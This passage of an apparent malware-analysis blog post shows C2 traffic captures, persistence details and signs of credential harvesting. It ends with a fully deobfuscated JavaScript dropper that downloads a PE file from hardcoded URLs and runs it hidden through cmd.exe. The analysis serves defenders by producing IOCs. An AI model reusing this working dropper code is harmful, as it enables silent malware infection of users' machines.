...A.../.M...zC.....f.=..3-.a	.....7TJ1!H.K...,R.vjK?#......z7\q....Ui..^.d..o.Qm.HW.-$.>.DpkXs .
.1.}.[.1.nyr.v=i.....aOfw...AE.X.?...kH._.....NJ.`...7.\.......UZ...I...nuH....].x..-.Yv..6.ZWj%.......`...5......u./....7;..).,?.Wu.......Z....4...k..;...7. .ju`Q.y..'-...V..~....._..?..3!.9...#.e[..=.<...../....m
.....L_.%J.....P...Yw}..q..R.Xa...w.....M5..A[Y...`..e.sg....eJ|......H[.!G...^......!.x..s........r..f..T...4...U.!FO.=6.....Z]ppOD...a..SZ..*;.w6 f..F..).-...L..|[.?sE.......9`...F....

The last set of check-ins, to 72.10.49.171, is much smaller in size and this time goes over port 8080.

GET / HTTP/1.1
Cookie: 3A5B=UXYvqtmil/m+Hk1jf9rsJzR5QRwiimUINqyjKYXzPRGWh52ndDULkif5NC2J42g8BuKtyMw0unJWIyjON3EVzIscxYO7W1mEafDRuj1D/mST+577sDN/4irQ7jsPGBP3BNOdyQtmYlqCOOLoXyv0XQ4qwvbgIRyd3EWQPDS10iPI15m1PVpNaYvaXmIAkngFr1r3uZGoyB74+NGQZIF4EKWZ6IG6n4s2yAB7vj59kzgZRqMr
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
Host: 72.10.49.171:8080
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 03 Jul 2017 13:57:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 132
Connection: keep-alive

B.A..
].kW.....M.lip.Vo.....5/oT.F.B...5..l..M	v.ej....Dl0.P..cu...)./....n
...f...t...............n.%9..A...... ...:..p..#.#r.xy...

Persistence is obtained by creating a shortcut to the malicious binary (GeneralizeMspthrd.exe) in the Startup folder (C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup). When I rebooted the system, I saw the process “GeneralizeMspthrd” spin up and check in with the IP address “50.3.75.246” over port 443 (still not encrypted), which looks very similar to the above GET requests to port 8080.

GET / HTTP/1.1
Cookie: 64CB=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
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
Host: 50.3.75.246:443
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 04 Jul 2017 08:22:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 132
Connection: keep-alive

..M~...
.o......*}4_gn.3....4.aM.#=.P.XT"B..i..t..(.z........H..@..!.1~..G}..\}q!....x"w..1....Lsr..u...l.......`.8.=..k...y%.Lp..m.[vb]

Lastly, from what I could tell in the Process Monitor logs, the GeneralizeMspthrd processes seem to read or set registry values around "Internet Settings" and to look for mail clients. Looking at some of the *.tmp files created by the malware, we can see evidence of some of what it was looking for.

[vb]
3A50.tmp
---------
Microsoft\Office\14.0\Outlook

3A51.tmp
--------
URL,Web Browser,User Name,Password,Password Strength,User Name Field,Password Field,Created Time,Modified Time

In an attempt to see if I could get some logs with my credentials in it, I did configure Outlook with a dummy account and also saved some dummy information into a site and rebooted the system to see if the GeneralizeMspthrd process would create the TMP file and also log my credentials into it. Unfortunately I was not able to get it to create a TMP file with my “dummy” credentials as the file that was created was empty.

I also recorded the infection as well and posted it up at my Youtube channel.

***Update 2017-07-04: Thanks to David Ledbetter since he gave me a hint as to how to de-obfuscate the javascript code. I feel dumb for not seeing the pattern in the code, but if you look through the script there is a repeat of the variable ‘rhj.’ Use your favorite editor and cut all instances of this variable and splice them together. When you do that, you get the following code block which is in hex.

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

which decoded is this:

var ao = [ "http://getsomeskillz.co.uk/sc/","http://internetcheapskate.com/ezeofbhwy/","http://hygienic.co.th/plugins/user/cpcferhen/","http://mclelland.net/eykijlaihw/","http://thetrillium.com/qtvrtgjem/" ];

// Returns a pseudo-random integer in the inclusive range [muk, uiu].
// Used by the dropper to pick a URL index and to randomise the dropped filename.
function ui( muk, uiu )
{
    var span = uiu - muk + 1;
    var offset = Math.floor( Math.random() * span );
    return muk + offset;
}

// Pops a randomly chosen entry from the module-level URL list `ao` so that each
// URL is tried at most once; returns false once the list is exhausted.
function yei()
{
    var aib = ui( 0, ao.length - 1 );
    var ox = ao[ aib ];
    // Remove the chosen URL so the caller's loop never retries it.
    ao.splice( aib, 1 );
    return ( ox == undefined ) ? false : ox;
}

// Builds the drop path: the temp folder (FileSystemObject.GetSpecialFolder(2))
// plus a "da<random>.aoo" filename -- which matches the da241556.aoo artifact above.
function kio()
{
    var ub = new ActiveXObject( "Scripting.FileSystemObject" ).GetSpecialFolder( 2 );
    var bi = "/da" + ui( 0, 999999 ) + ".aoo";
    return ub + bi;
}

// Executes the dropped file through cmd.exe via WScript.Shell.Run. The second
// argument (false) is the window-style parameter and coerces to 0, i.e. hidden.
// The return value `yis` is never inspected, so a failed launch goes unnoticed.
function zkr( aa )
{
    var ii = new ActiveXObject( "WScript.Shell" );
    var hik = 'cmd.exe /c "' + aa + '"';
    var yis = ii.Run( hik, false );
    
    }

// Writes the raw HTTP response body `puw` to the file at path `aa` using the
// module-level ADODB.Stream `soj`: Type = 1 selects binary mode and
// SaveToFile(..., 2) overwrites an existing file.
function xao( puw, aa )
{
    soj.Open();
    soj.Type = 1;
    soj.Write( puw );
    soj.Position = 0;
    soj.SaveToFile( aa, 2 );
    soj.Close();
}

// True when the response text begins with the "MZ" DOS header, i.e. the server
// returned a PE file rather than an HTML page.
function ouq( ej )
{
    var body = ej.responseText;
    return body.search( /^MZ/ ) === 0;
}

// Download loop: fetch the URLs in random order until one answers with a PE
// file (leading "MZ"), save that body to the temp folder and run it, then stop.
// Any exception (e.g. a failed connection) is swallowed and the next URL is tried.
var ej = new ActiveXObject( "MSXML2.XMLHTTP" );
var soj = new ActiveXObject( "ADODB.Stream" );
while( true ) {
    var olx = yei();
    // yei() returns false once every URL has been tried.
    if( ! olx ) {
                break;
    }
    try {
                // Synchronous GET (third argument false) so the body is ready after Send().
                ej.Open( "GET", olx, false );
        ej.Send();
        
        
        // Only a response starting with "MZ" is accepted; HTML error pages are skipped.
        if( ouq( ej ) ) {
                        var aa = kio();
            xao( ej.ResponseBody, aa );
                        zkr( aa );
                        
            break;
        }
        else {
                    }
    }
    // Errors are silently ignored; the loop simply moves on to the next URL.
    catch( zwr ) {
            }
}

I have updated the IOC list to include the URLs found in the code.
